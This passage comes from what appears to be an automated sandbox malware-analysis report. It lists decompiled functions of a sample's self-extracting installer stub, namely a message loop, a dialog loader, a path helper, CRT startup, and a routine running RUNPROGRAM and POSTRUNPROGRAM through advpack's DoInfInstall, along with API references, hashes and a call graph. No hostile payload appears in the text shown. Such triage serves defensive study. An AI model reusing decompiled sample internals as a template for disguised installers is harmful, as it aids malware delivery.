                                                					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                						continue;
                                                					} else {
                                                						do {
                                                							if(_v36.message != 0x12) {
                                                								DispatchMessageA( &_v36);
                                                							} else {
                                                								_t16 = 1;
                                                							}
                                                							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                						} while (_t8 != 0);
                                                						if(_t16 == 0) {
                                                							continue;
                                                						}
                                                					}
                                                					break;
                                                				}
                                                				return _t8;
                                                			}







                                                0x00ac368c
                                                0x00ac368f
                                                0x00ac3691
                                                0x00ac369f
                                                0x00ac36a7
                                                0x00000000
                                                0x00000000
                                                0x00ac36ba
                                                0x00000000
                                                0x00ac36bc
                                                0x00ac36bc
                                                0x00ac36c0
                                                0x00ac36cb
                                                0x00ac36c2
                                                0x00ac36c4
                                                0x00ac36c4
                                                0x00ac36da
                                                0x00ac36e0
                                                0x00ac36e6
                                                0x00000000
                                                0x00000000
                                                0x00ac36e6
                                                0x00000000
                                                0x00ac36ba
                                                0x00ac36ed

                                                APIs
                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00AC369F
                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00AC36B2
                                                • DispatchMessageA.USER32(?), ref: 00AC36CB
                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00AC36DA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                • String ID:
                                                • API String ID: 2776232527-0
                                                • Opcode ID: cfa16c19f46fd035aeb89318efd15681a62fb91d2c65d96c37b91ed23db50a99
                                                • Instruction ID: ee9ac267a3e1464614d3ea284d0d7da73b39890b8ce6f83c70dbccd42be04a6f
                                                • Opcode Fuzzy Hash: cfa16c19f46fd035aeb89318efd15681a62fb91d2c65d96c37b91ed23db50a99
                                                • Instruction Fuzzy Hash: C301847390021877DF308BE65C4CFEB777CEB85B14F05421DB915E2280D6608641C6A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00AC6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                				struct HRSRC__* _t6;
                                                				void* _t21;
                                                				struct HINSTANCE__* _t23;
                                                				int _t24;
                                                
                                                				_t23 =  *0xac9a3c; // 0xac0000
                                                				_t6 = FindResourceA(_t23, __edx, 5);
                                                				if(_t6 == 0) {
                                                					L6:
                                                					E00AC44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                					_t24 = _a16;
                                                				} else {
                                                					_t21 = LoadResource(_t23, _t6);
                                                					if(_t21 == 0) {
                                                						goto L6;
                                                					} else {
                                                						if(_a12 != 0) {
                                                							_push(_a12);
                                                						} else {
                                                							_push(0);
                                                						}
                                                						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                						FreeResource(_t21);
                                                						if(_t24 == 0xffffffff) {
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t24;
                                                			}







                                                0x00ac651f
                                                0x00ac652a
                                                0x00ac6534
                                                0x00ac656b
                                                0x00ac6577
                                                0x00ac657c
                                                0x00ac6536
                                                0x00ac653e
                                                0x00ac6542
                                                0x00000000
                                                0x00ac6544
                                                0x00ac6547
                                                0x00ac654c
                                                0x00ac6549
                                                0x00ac6549
                                                0x00ac6549
                                                0x00ac655e
                                                0x00ac6560
                                                0x00ac6569
                                                0x00000000
                                                0x00000000
                                                0x00ac6569
                                                0x00ac6542
                                                0x00ac6587

                                                APIs
                                                • FindResourceA.KERNEL32(00AC0000,000007D6,00000005), ref: 00AC652A
                                                • LoadResource.KERNEL32(00AC0000,00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00AC6538
                                                • DialogBoxIndirectParamA.USER32(00AC0000,00000000,00000547,00AC19E0,00000000), ref: 00AC6557
                                                • FreeResource.KERNEL32(00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00AC6560
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                • String ID:
                                                • API String ID: 1214682469-0
                                                • Opcode ID: d6d3a3b4ef3d80527155bddcf99ff48964b6e8426c6ea53ec7f81f8736fa842d
                                                • Instruction ID: 73d0f6eb70b5b5f1e2cbf881342bb1f83809fd55c0d0bd2a64438bb440a55d36
                                                • Opcode Fuzzy Hash: d6d3a3b4ef3d80527155bddcf99ff48964b6e8426c6ea53ec7f81f8736fa842d
                                                • Instruction Fuzzy Hash: 6601267250060DBBCB10DFA9AC08EBB7A6CEB89364F160229FE1093150DB71CC11C6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E00AC65E8(char* __ecx) {
                                                				char _t3;
                                                				char _t10;
                                                				char* _t12;
                                                				char* _t14;
                                                				char* _t15;
                                                				CHAR* _t16;
                                                
                                                				_t12 = __ecx;
                                                				_t15 = __ecx;
                                                				_t14 =  &(__ecx[1]);
                                                				_t10 = 0;
                                                				do {
                                                					_t3 =  *_t12;
                                                					_t12 =  &(_t12[1]);
                                                				} while (_t3 != 0);
                                                				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                				while(1) {
                                                					_t16 = CharPrevA(_t15, ??);
                                                					if(_t16 <= _t15) {
                                                						break;
                                                					}
                                                					if( *_t16 == 0x5c) {
                                                						L7:
                                                						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                							_t16 = CharNextA(_t16);
                                                						}
                                                						 *_t16 = _t10;
                                                						_t10 = 1;
                                                					} else {
                                                						_push(_t16);
                                                						continue;
                                                					}
                                                					L11:
                                                					return _t10;
                                                				}
                                                				if( *_t16 == 0x5c) {
                                                					goto L7;
                                                				}
                                                				goto L11;
                                                			}









                                                0x00ac65e8
                                                0x00ac65ed
                                                0x00ac65ef
                                                0x00ac65f2
                                                0x00ac65f4
                                                0x00ac65f4
                                                0x00ac65f6
                                                0x00ac65f7
                                                0x00ac6608
                                                0x00ac6611
                                                0x00ac6618
                                                0x00ac661c
                                                0x00000000
                                                0x00000000
                                                0x00ac660e
                                                0x00ac6623
                                                0x00ac6625
                                                0x00ac663b
                                                0x00ac663b
                                                0x00ac663d
                                                0x00ac6641
                                                0x00ac6610
                                                0x00ac6610
                                                0x00000000
                                                0x00ac6610
                                                0x00ac6644
                                                0x00ac6647
                                                0x00ac6647
                                                0x00ac6621
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00AC2B33), ref: 00AC6602
                                                • CharPrevA.USER32(?,00000000), ref: 00AC6612
                                                • CharPrevA.USER32(?,00000000), ref: 00AC6629
                                                • CharNextA.USER32(00000000), ref: 00AC6635
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Char$Prev$Next
                                                • String ID:
                                                • API String ID: 3260447230-0
                                                • Opcode ID: 2541e9092df2abd33566ee43e6edcd780f94b6670e847fbbc326f3b2c65a800e
                                                • Instruction ID: a7a2605a94388d0adf783b77256fe0a42541242b736acb55fbd96c901f89c2c4
                                                • Opcode Fuzzy Hash: 2541e9092df2abd33566ee43e6edcd780f94b6670e847fbbc326f3b2c65a800e
                                                • Instruction Fuzzy Hash: 61F028320041906EE7369B698C8CEBBBF9CCF9B358B2F02BFE4A183001D6150D078662
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC69B0() {
                                                				intOrPtr* _t4;
                                                				intOrPtr* _t5;
                                                				void* _t6;
                                                				intOrPtr _t11;
                                                				intOrPtr _t12;
                                                
                                                				 *0xac81f8 = E00AC6C70();
                                                				__set_app_type(E00AC6FBE(2));
                                                				 *0xac88a4 =  *0xac88a4 | 0xffffffff;
                                                				 *0xac88a8 =  *0xac88a8 | 0xffffffff;
                                                				_t4 = __p__fmode();
                                                				_t11 =  *0xac8528; // 0x0
                                                				 *_t4 = _t11;
                                                				_t5 = __p__commode();
                                                				_t12 =  *0xac851c; // 0x0
                                                				 *_t5 = _t12;
                                                				_t6 = E00AC7000();
                                                				if( *0xac8000 == 0) {
                                                					__setusermatherr(E00AC7000);
                                                				}
                                                				E00AC71EF(_t6);
                                                				return 0;
                                                			}








                                                0x00ac69b7
                                                0x00ac69c2
                                                0x00ac69c8
                                                0x00ac69cf
                                                0x00ac69d8
                                                0x00ac69de
                                                0x00ac69e4
                                                0x00ac69e6
                                                0x00ac69ec
                                                0x00ac69f2
                                                0x00ac69f4
                                                0x00ac6a00
                                                0x00ac6a07
                                                0x00ac6a0d
                                                0x00ac6a0e
                                                0x00ac6a15

                                                APIs
                                                  • Part of subcall function 00AC6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00AC6FC5
                                                • __set_app_type.MSVCRT ref: 00AC69C2
                                                • __p__fmode.MSVCRT ref: 00AC69D8
                                                • __p__commode.MSVCRT ref: 00AC69E6
                                                • __setusermatherr.MSVCRT ref: 00AC6A07
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                • String ID:
                                                • API String ID: 1632413811-0
                                                • Opcode ID: f114f2ef10db650e3f137fd6bf9d17d2cb03bddbff0d1d3c71705fc4000c9f4b
                                                • Instruction ID: 5f706f0d73c9bfdd797c8d3b9efc9e45a1f070df281de09b096c6862047feade
                                                • Opcode Fuzzy Hash: f114f2ef10db650e3f137fd6bf9d17d2cb03bddbff0d1d3c71705fc4000c9f4b
                                                • Instruction Fuzzy Hash: ADF0DFB01083198FC718EBB0AE0AF683BA1BB14325B13060DE462962F0CF7E85438B11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_002F6E2A 106 Function_002F6CF0 0->106 1 Function_002F202A 18 Function_002F171E 1->18 63 Function_002F44B9 1->63 69 Function_002F658A 1->69 98 Function_002F6CE0 1->98 2 Function_002F3B26 23 Function_002F6517 2->23 80 Function_002F6298 2->80 96 Function_002F4FE0 2->96 3 Function_002F4224 3->63 75 Function_002F1680 3->75 4 Function_002F7120 5 Function_002F6A20 6 Function_002F3A3F 6->23 6->63 67 Function_002F468F 6->67 71 Function_002F6285 6->71 7 Function_002F6C3F 8 Function_002F4C37 9 Function_002F2630 9->63 9->98 10 Function_002F490C 11 Function_002F7208 12 Function_002F6C03 42 Function_002F724D 12->42 13 Function_002F4702 65 Function_002F16B3 13->65 13->75 14 Function_002F7000 15 Function_002F4200 16 Function_002F3100 119 Function_002F43D0 16->119 17 Function_002F681F 17->98 105 Function_002F66F9 17->105 19 Function_002F621E 37 Function_002F597D 19->37 19->63 19->71 19->98 20 Function_002F2F1D 20->2 20->6 20->19 26 Function_002F256D 20->26 28 Function_002F4169 20->28 31 Function_002F5164 20->31 56 Function_002F3BA2 20->56 60 Function_002F55A0 20->60 20->63 20->69 20->71 94 Function_002F51E5 20->94 20->98 21 Function_002F411B 53 Function_002F1EA7 21->53 22 Function_002F5C17 23->63 24 Function_002F3210 24->3 24->37 24->63 24->69 110 Function_002F58C8 24->110 24->119 25 Function_002F7010 99 Function_002F24E0 26->99 27 Function_002F476D 27->23 50 Function_002F66AE 27->50 28->63 28->67 29 Function_002F5467 29->37 58 Function_002F53A1 29->58 29->69 29->71 73 Function_002F1781 29->73 29->75 29->98 29->110 30 Function_002F2267 30->18 30->69 30->98 31->63 31->67 31->80 32 Function_002F6A60 32->7 32->11 34 Function_002F7060 32->34 32->42 45 Function_002F7155 32->45 104 Function_002F2BFB 32->104 33 Function_002F4B60 34->4 34->25 35 Function_002F6760 36 Function_002F667F 43 Function_002F6648 36->43 37->63 68 Function_002F268B 37->68 37->71 37->98 38 Function_002F487A 38->10 39 Function_002F2773 39->69 39->73 39->75 39->98 40 Function_002F7270 41 Function_002F6C70 44 Function_002F6F40 46 Function_002F6F54 46->11 46->42 47 Function_002F6952 48 Function_002F4A50 49 Function_002F3450 49->119 51 Function_002F2AAC 51->75 93 Function_002F65E8 51->93 51->98 112 Function_002F17C8 51->112 52 Function_002F2CAA 52->23 55 Function_002F18A3 52->55 52->63 52->67 78 Function_002F5C9E 52->78 83 Function_002F2390 52->83 88 Function_002F36EE 52->88 52->98 53->26 54 Function_002F6FA5 54->42 89 Function_002F17EE 55->89 55->98 56->1 56->30 56->63 56->67 56->71 56->73 81 Function_002F6495 56->81 85 Function_002F3FEF 56->85 91 Function_002F1AE8 56->91 56->98 57 Function_002F72A2 58->18 58->69 58->75 58->98 59 Function_002F6FA1 60->9 60->23 60->29 60->37 60->47 60->63 60->67 60->69 60->71 60->73 60->98 61 Function_002F4CA0 62 Function_002F6FBE 62->46 63->17 63->18 63->75 63->98 109 Function_002F67C9 63->109 64 Function_002F52B6 64->73 64->83 64->93 95 Function_002F1FE1 64->95 64->98 65->73 66 Function_002F69B0 66->14 66->41 66->62 86 Function_002F71EF 66->86 68->18 68->63 68->98 69->65 70 Function_002F2A89 72 Function_002F1A84 72->36 74 Function_002F4980 74->38 74->63 75->73 76 Function_002F3680 77 Function_002F6380 78->0 78->22 78->36 78->63 78->69 78->75 97 Function_002F31E0 78->97 78->98 111 Function_002F66C8 78->111 79 Function_002F4E99 79->75 80->18 80->98 81->69 81->73 81->98 82 Function_002F6793 83->65 83->69 83->75 83->83 83->98 84 Function_002F1F90 84->53 84->63 84->98 85->21 85->63 85->71 85->98 87 Function_002F6BEF 88->17 88->63 88->70 92 Function_002F28E8 88->92 88->98 88->109 89->98 90 Function_002F70EB 91->18 91->51 91->63 91->65 91->69 91->72 91->73 91->75 91->98 91->111 92->39 92->70 94->63 94->67 94->71 96->63 96->67 103 Function_002F4EFD 96->103 98->106 99->69 99->98 100 Function_002F19E0 100->98 100->119 101 Function_002F47E0 101->63 101->75 102 Function_002F70FE 103->33 103->74 103->98 104->20 104->52 104->64 104->84 107 Function_002F34F0 107->63 107->76 107->119 108 Function_002F6EF0 109->82 110->63 110->69 110->71 110->75 111->43 113 Function_002F4CC0 114 Function_002F4BC0 115 Function_002F30C0 116 Function_002F63C0 116->69 116->73 116->98 117 Function_002F4CD0 117->8 117->13 117->27 117->33 117->74 117->79 117->98 117->101 118 Function_002F4AD0 118->76 119->98

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 36 2f3ba2-2f3bd9 37 2f3bfd-2f3bff 36->37 38 2f3bdb-2f3bee call 2f468f 36->38 39 2f3c03-2f3c28 memset 37->39 45 2f3bf4-2f3bf7 38->45 46 2f3d13-2f3d30 call 2f44b9 38->46 41 2f3c2e-2f3c40 call 2f468f 39->41 42 2f3d35-2f3d48 call 2f1781 39->42 41->46 53 2f3c46-2f3c49 41->53 48 2f3d4d-2f3d52 42->48 45->37 45->46 58 2f3f4d 46->58 51 2f3d9e-2f3db6 call 2f1ae8 48->51 52 2f3d54-2f3d6c call 2f468f 48->52 51->58 69 2f3dbc-2f3dc2 51->69 52->46 65 2f3d6e-2f3d75 52->65 53->46 56 2f3c4f-2f3c56 53->56 61 2f3c58-2f3c5e 56->61 62 2f3c60-2f3c65 56->62 59 2f3f4f-2f3f63 call 2f6ce0 58->59 66 2f3c6e-2f3c73 61->66 67 2f3c67-2f3c6d 62->67 68 2f3c75-2f3c7c 62->68 71 2f3d7b-2f3d98 CompareStringA 65->71 72 2f3fda-2f3fe1 65->72 73 2f3c87-2f3c89 66->73 67->66 68->73 76 2f3c7e-2f3c82 68->76 74 2f3de6-2f3de8 69->74 75 2f3dc4-2f3dce 69->75 71->51 71->72 79 2f3fe8-2f3fea 72->79 80 2f3fe3 call 2f2267 72->80 73->48 82 2f3c8f-2f3c98 73->82 77 2f3dee-2f3df5 74->77 78 2f3f0b-2f3f15 call 2f3fef 74->78 75->74 81 2f3dd0-2f3dd7 75->81 76->73 83 2f3fab-2f3fd2 call 2f44b9 LocalFree 77->83 84 2f3dfb-2f3dfd 77->84 92 2f3f1a-2f3f1c 78->92 79->59 80->79 81->74 87 2f3dd9-2f3ddb 81->87 88 2f3c9a-2f3c9c 82->88 89 2f3cf1-2f3cf3 82->89 83->58 84->78 90 2f3e03-2f3e0a 84->90 87->77 93 2f3ddd-2f3de1 call 2f202a 87->93 95 2f3c9e-2f3ca3 88->95 96 2f3ca5-2f3ca7 88->96 89->51 91 2f3cf9-2f3d11 call 2f468f 89->91 90->78 99 2f3e10-2f3e19 call 2f6495 90->99 91->46 91->48 101 2f3f1e-2f3f2d LocalFree 92->101 102 2f3f46-2f3f47 LocalFree 92->102 93->74 97 2f3cb2-2f3cc5 call 2f468f 95->97 96->58 98 2f3cad 96->98 97->46 112 2f3cc7-2f3ce8 CompareStringA 97->112 98->97 113 2f3e1f-2f3e36 GetProcAddress 99->113 114 2f3f92-2f3fa9 call 2f44b9 99->114 108 2f3fd7-2f3fd9 101->108 109 2f3f33-2f3f3b 101->109 102->58 108->72 109->39 112->89 115 2f3cea-2f3ced 112->115 116 2f3e3c-2f3e80 113->116 117 2f3f64-2f3f76 call 2f44b9 FreeLibrary 113->117 126 2f3f7c-2f3f90 LocalFree call 2f6285 114->126 115->89 120 2f3e8b-2f3e94 116->120 121 2f3e82-2f3e87 116->121 117->126 124 2f3e9f-2f3ea2 120->124 125 2f3e96-2f3e9b 120->125 121->120 128 2f3ead-2f3eb6 124->128 129 2f3ea4-2f3ea9 124->129 125->124 126->58 131 2f3eb8-2f3ebd 128->131 132 2f3ec1-2f3ec3 128->132 129->128 131->132 133 2f3ece-2f3eec 132->133 134 2f3ec5-2f3eca 132->134 137 2f3eee-2f3ef3 133->137 138 2f3ef5-2f3efd 133->138 134->133 137->138 139 2f3eff-2f3f09 FreeLibrary 138->139 140 2f3f40 FreeLibrary 138->140 139->101 140->102
                                                C-Code - Quality: 82%
                                                			E002F3BA2() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v276;
                                                				char _v280;
                                                				short _v300;
                                                				intOrPtr _v304;
                                                				void _v348;
                                                				char _v352;
                                                				intOrPtr _v356;
                                                				signed int _v360;
                                                				short _v364;
                                                				char* _v368;
                                                				intOrPtr _v372;
                                                				void* _v376;
                                                				intOrPtr _v380;
                                                				char _v384;
                                                				signed int _v388;
                                                				intOrPtr _v392;
                                                				signed int _v396;
                                                				signed int _v400;
                                                				signed int _v404;
                                                				void* _v408;
                                                				void* _v424;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t69;
                                                				signed int _t76;
                                                				void* _t77;
                                                				signed int _t79;
                                                				short _t96;
                                                				signed int _t97;
                                                				intOrPtr _t98;
                                                				signed int _t101;
                                                				signed int _t104;
                                                				signed int _t108;
                                                				int _t112;
                                                				void* _t115;
                                                				signed char _t118;
                                                				void* _t125;
                                                				signed int _t127;
                                                				void* _t128;
                                                				struct HINSTANCE__* _t129;
                                                				void* _t130;
                                                				short _t137;
                                                				char* _t140;
                                                				signed char _t144;
                                                				signed char _t145;
                                                				signed int _t149;
                                                				void* _t150;
                                                				void* _t151;
                                                				signed int _t153;
                                                				void* _t155;
                                                				void* _t156;
                                                				signed int _t157;
                                                				signed int _t162;
                                                				signed int _t164;
                                                				void* _t165;
                                                
                                                				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                				_t69 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t69 ^ _t164;
                                                				_t153 = 0;
                                                				 *0x2f9124 =  *0x2f9124 & 0;
                                                				_t149 = 0;
                                                				_v388 = 0;
                                                				_v384 = 0;
                                                				_t165 =  *0x2f8a28 - _t153; // 0x0
                                                				if(_t165 != 0) {
                                                					L3:
                                                					_t127 = 0;
                                                					_v392 = 0;
                                                					while(1) {
                                                						_v400 = _v400 & 0x00000000;
                                                						memset( &_v348, 0, 0x44);
                                                						_t164 = _t164 + 0xc;
                                                						_v348 = 0x44;
                                                						if( *0x2f8c42 != 0) {
                                                							goto L26;
                                                						}
                                                						_t146 =  &_v396;
                                                						_t115 = E002F468F("SHOWWINDOW",  &_v396, 4);
                                                						if(_t115 == 0 || _t115 > 4) {
                                                							L25:
                                                							_t146 = 0x4b1;
                                                							E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                							 *0x2f9124 = 0x80070714;
                                                							goto L62;
                                                						} else {
                                                							if(_v396 != 1) {
                                                								__eflags = _v396 - 2;
                                                								if(_v396 != 2) {
                                                									_t137 = 3;
                                                									__eflags = _v396 - _t137;
                                                									if(_v396 == _t137) {
                                                										_v304 = 1;
                                                										_v300 = _t137;
                                                									}
                                                									goto L14;
                                                								}
                                                								_push(6);
                                                								_v304 = 1;
                                                								_pop(0);
                                                								goto L11;
                                                							} else {
                                                								_v304 = 1;
                                                								L11:
                                                								_v300 = 0;
                                                								L14:
                                                								if(_t127 != 0) {
                                                									L27:
                                                									_t155 = 1;
                                                									__eflags = _t127 - 1;
                                                									if(_t127 != 1) {
                                                										L31:
                                                										_t132 =  &_v280;
                                                										_t76 = E002F1AE8( &_v280,  &_v408,  &_v404); // executed
                                                										__eflags = _t76;
                                                										if(_t76 == 0) {
                                                											L62:
                                                											_t77 = 0;
                                                											L63:
                                                											_pop(_t150);
                                                											_pop(_t156);
                                                											_pop(_t128);
                                                											return E002F6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                										}
                                                										_t157 = _v404;
                                                										__eflags = _t149;
                                                										if(_t149 != 0) {
                                                											L37:
                                                											__eflags = _t157;
                                                											if(_t157 == 0) {
                                                												L57:
                                                												_t151 = _v408;
                                                												_t146 =  &_v352;
                                                												_t130 = _t151; // executed
                                                												_t79 = E002F3FEF(_t130,  &_v352); // executed
                                                												__eflags = _t79;
                                                												if(_t79 == 0) {
                                                													L61:
                                                													LocalFree(_t151);
                                                													goto L62;
                                                												}
                                                												L58:
                                                												LocalFree(_t151);
                                                												_t127 = _t127 + 1;
                                                												_v396 = _t127;
                                                												__eflags = _t127 - 2;
                                                												if(_t127 >= 2) {
                                                													_t155 = 1;
                                                													__eflags = 1;
                                                													L69:
                                                													__eflags =  *0x2f8580;
                                                													if( *0x2f8580 != 0) {
                                                														E002F2267();
                                                													}
                                                													_t77 = _t155;
                                                													goto L63;
                                                												}
                                                												_t153 = _v392;
                                                												_t149 = _v388;
                                                												continue;
                                                											}
                                                											L38:
                                                											__eflags =  *0x2f8180;
                                                											if( *0x2f8180 == 0) {
                                                												_t146 = 0x4c7;
                                                												E002F44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                												LocalFree(_v424);
                                                												 *0x2f9124 = 0x8007042b;
                                                												goto L62;
                                                											}
                                                											__eflags = _t157;
                                                											if(_t157 == 0) {
                                                												goto L57;
                                                											}
                                                											__eflags =  *0x2f9a34 & 0x00000004;
                                                											if(__eflags == 0) {
                                                												goto L57;
                                                											}
                                                											_t129 = E002F6495(_t127, _t132, _t157, __eflags);
                                                											__eflags = _t129;
                                                											if(_t129 == 0) {
                                                												_t146 = 0x4c8;
                                                												E002F44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                												L65:
                                                												LocalFree(_v408);
                                                												 *0x2f9124 = E002F6285();
                                                												goto L62;
                                                											}
                                                											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                											_v404 = _t146;
                                                											__eflags = _t146;
                                                											if(_t146 == 0) {
                                                												_t146 = 0x4c9;
                                                												__eflags = 0;
                                                												E002F44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                												FreeLibrary(_t129);
                                                												goto L65;
                                                											}
                                                											__eflags =  *0x2f8a30;
                                                											_t151 = _v408;
                                                											_v384 = 0;
                                                											_v368 =  &_v280;
                                                											_t96 =  *0x2f9a40; // 0x3
                                                											_v364 = _t96;
                                                											_t97 =  *0x2f8a38 & 0x0000ffff;
                                                											_v380 = 0x2f9154;
                                                											_v376 = _t151;
                                                											_v372 = 0x2f91e4;
                                                											_v360 = _t97;
                                                											if( *0x2f8a30 != 0) {
                                                												_t97 = _t97 | 0x00010000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											_t144 =  *0x2f9a34; // 0x1
                                                											__eflags = _t144 & 0x00000008;
                                                											if((_t144 & 0x00000008) != 0) {
                                                												_t97 = _t97 | 0x00020000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											__eflags = _t144 & 0x00000010;
                                                											if((_t144 & 0x00000010) != 0) {
                                                												_t97 = _t97 | 0x00040000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											_t145 =  *0x2f8d48; // 0x0
                                                											__eflags = _t145 & 0x00000040;
                                                											if((_t145 & 0x00000040) != 0) {
                                                												_t97 = _t97 | 0x00080000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											__eflags = _t145;
                                                											if(_t145 < 0) {
                                                												_t104 = _t97 | 0x00100000;
                                                												__eflags = _t104;
                                                												_v360 = _t104;
                                                											}
                                                											_t98 =  *0x2f9a38; // 0x0
                                                											_v356 = _t98;
                                                											_t130 = _t146;
                                                											 *0x2fa288( &_v384);
                                                											_t101 = _v404();
                                                											__eflags = _t164 - _t164;
                                                											if(_t164 != _t164) {
                                                												_t130 = 4;
                                                												asm("int 0x29");
                                                											}
                                                											 *0x2f9124 = _t101;
                                                											_push(_t129);
                                                											__eflags = _t101;
                                                											if(_t101 < 0) {
                                                												FreeLibrary();
                                                												goto L61;
                                                											} else {
                                                												FreeLibrary();
                                                												_t127 = _v400;
                                                												goto L58;
                                                											}
                                                										}
                                                										__eflags =  *0x2f9a40 - 1; // 0x3
                                                										if(__eflags == 0) {
                                                											goto L37;
                                                										}
                                                										__eflags =  *0x2f8a20;
                                                										if( *0x2f8a20 == 0) {
                                                											goto L37;
                                                										}
                                                										__eflags = _t157;
                                                										if(_t157 != 0) {
                                                											goto L38;
                                                										}
                                                										_v388 = 1;
                                                										E002F202A(_t146); // executed
                                                										goto L37;
                                                									}
                                                									_t146 =  &_v280;
                                                									_t108 = E002F468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                									__eflags = _t108;
                                                									if(_t108 == 0) {
                                                										goto L25;
                                                									}
                                                									__eflags =  *0x2f8c42;
                                                									if( *0x2f8c42 != 0) {
                                                										goto L69;
                                                									}
                                                									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                									__eflags = _t112 == 0;
                                                									if(_t112 == 0) {
                                                										goto L69;
                                                									}
                                                									goto L31;
                                                								}
                                                								_t118 =  *0x2f8a38; // 0x0
                                                								if(_t118 == 0) {
                                                									L23:
                                                									if(_t153 != 0) {
                                                										goto L31;
                                                									}
                                                									_t146 =  &_v276;
                                                									if(E002F468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                										goto L27;
                                                									}
                                                									goto L25;
                                                								}
